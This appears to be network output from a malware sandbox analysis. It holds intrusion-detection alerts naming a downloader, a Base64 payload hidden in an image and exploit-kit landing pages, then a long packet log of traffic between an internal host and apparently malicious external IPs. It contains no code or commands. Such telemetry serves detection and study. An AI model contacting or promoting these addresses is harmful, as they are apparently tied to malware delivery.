2024-10-08T15:24:04.397505+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.22 | 49175 | 178.237.33.50 | 80 | TCP
2024-10-08T15:24:20.543211+0200 | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 207.241.227.242 | 443 | 192.168.2.22 | 49176 | TCP
2024-10-08T15:24:21.488970+0200 | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49177 | TCP
2024-10-08T15:24:21.488970+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 192.3.220.40 | 80 | 192.168.2.22 | 49177 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793236971 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793236971 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793267965 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793268919 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793268919 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793792009 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793816090 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793828011 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793858051 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793858051 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.793870926 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.795974016 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.796061993 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.881931067 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.881959915 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.881973028 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.881983995 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.881994963 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882009983 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882023096 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882023096 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882023096 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882023096 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882074118 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882074118 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882075071 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882076025 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882184029 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882282019 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882303953 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882316113 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882328033 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882359028 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882359028 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882498980 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882519960 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882555008 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882555008 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882575035 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882586956 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882600069 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882677078 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882677078 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882694006 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882707119 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882719040 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882730961 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882747889 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.882766962 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883193970 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883208036 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883220911 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883258104 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883258104 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883282900 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883296013 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883310080 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883322001 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883349895 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883349895 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883438110 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883450031 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883456945 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883466005 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883487940 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.883563995 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884129047 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884144068 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884155035 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884166956 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884192944 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884192944 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884222031 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884282112 CEST8049162192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.884390116 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.127115965 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.127168894 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.127245903 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.133897066 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.133897066 CEST4916280192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.142226934 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.142247915 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.630146027 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.630295992 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.637792110 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.637813091 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.638200998 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.642036915 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.829835892 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:42.871402025 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.229732037 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.229806900 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.229818106 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.229846954 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.288863897 CEST49163443192.168.2.22188.114.97.3
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.288888931 CEST44349163188.114.97.3192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.394150019 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.399003983 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.399058104 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046679020 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046756029 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046768904 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046788931 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046803951 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.046823978 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047602892 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047616959 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047636986 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047652960 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047657013 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047663927 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047674894 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047688961 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047691107 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047708035 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047723055 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047725916 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.047760010 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.048614979 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.048625946 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.048639059 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.048681021 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129527092 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129537106 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129656076 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129689932 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129714012 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129719973 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129725933 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129745960 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129749060 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129755974 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129761934 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129791975 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129848003 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129854918 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129859924 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129883051 CEST8049164192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129893064 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129900932 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.129918098 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:44.130067110 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.729429007 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.734328032 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.734447956 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.734661102 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.739552975 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:48.757370949 CEST4916480192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.200908899 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.200983047 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201010942 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201028109 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201035023 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201040030 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201046944 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201061964 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201077938 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201092958 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201093912 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201158047 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.201158047 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206182003 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206219912 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206257105 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206326008 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.206326008 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.219839096 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287586927 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287620068 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287632942 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287647009 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287657022 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287673950 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287729979 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287729979 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.287990093 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288009882 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288021088 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288125992 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288137913 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288180113 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288180113 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288682938 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288723946 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288734913 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288734913 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288783073 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288814068 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288825035 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288875103 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.288875103 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289864063 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289875984 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289887905 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289932966 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289957047 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.289969921 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.290026903 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465347052 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465358973 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465369940 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465392113 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465399981 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465426922 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465436935 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465553999 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465835094 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465846062 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465857029 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465867043 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465881109 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465920925 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465920925 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465981960 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.465992928 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466002941 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466047049 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466047049 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466150999 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466164112 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466173887 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466187000 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466197968 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466207027 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466247082 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466247082 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466646910 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466667891 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466732025 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466732025 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466814995 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466826916 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466839075 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466850996 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466871023 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466911077 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466911077 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466953993 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.466965914 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.467027903 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469352961 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469366074 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469403982 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469427109 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469654083 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469666004 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469679117 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469701052 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469713926 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469722986 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469742060 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469753981 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469754934 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469764948 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469777107 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469780922 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469788074 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469799995 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469804049 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469804049 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469810963 CEST8049165192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469835043 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.469902039 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.470145941 CEST4916580192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:23:49.520504951 CEST8049165192.3.220.40192.168.2.22
